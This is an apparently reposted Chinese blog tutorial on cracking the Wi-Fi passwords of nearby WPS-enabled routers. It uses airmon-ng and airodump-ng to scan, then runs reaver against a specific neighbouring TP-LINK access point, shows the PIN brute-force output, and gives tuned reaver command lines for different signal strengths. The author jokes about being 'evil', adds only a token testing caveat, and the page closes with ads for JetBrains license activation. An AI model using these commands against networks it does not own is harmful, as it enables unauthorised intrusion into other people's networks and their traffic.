大家好,又见面了,我是你们的朋友全栈君。
使用 aircrack,寻找附近开启wps的路由器,邪恶……嘻嘻
airmon-ng start wlan0 airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0E:2E:FD:C4:BB -1 0 0 0 -1 -1 <length: 0>
4C:E6:76:60:3F:20 -13 123 0 0 11 54e WPA2 CCMP PSK cuier-1
B0:48:7A:52:F4:72 -23 42 0 0 1 WPA2 CCMP PSK FAST_52F472
8C:21:0A:5F:A2:FA -35 28 0 0 1 WPA2 CCMP PSK TP-LINK_5FA2FA
E0:05:C5:D3:3F:00 -42 33 0 0 2 WPA2 CCMP PSK TP-LINK_D33F00
EC:17:2F:7D:12:1E -49 56 1 0 6 WPA2 CCMP PSK wg7788
B0:48:7A:5D:22:EA -51 36 0 0 6 WPA2 CCMP PSK TP-LINK_1202
使用reaver 破解开启wps功能的路由器密码
比如这条,信号还不错
8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA root@home:~/soft/reaver-1.4# reaver -i mon0 -b 8C:21:0A:5F:A2:FA -a -S -vv -d2 -t 5 -c 1Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching mon0 to channel 1[+] Waiting for beacon from 8C:21:0A:5F:A2:FA[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response
这样就开始破解了哦,耐心等待结果就好了……不要太邪恶哦。做做测试还是可以的,要做个好童鞋……
##########################################################################
附上reaver调整参数的一些小技巧
reaver:
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
注:54e后面有点(.)的是开了wps。但是这个要多试几次才准。可以先用Qss软件测试一下
现在的新版路由器已经加入防PING功能,,,而且默认关闭了WPS,,,WPS时代即将过去。。。。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/137411.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...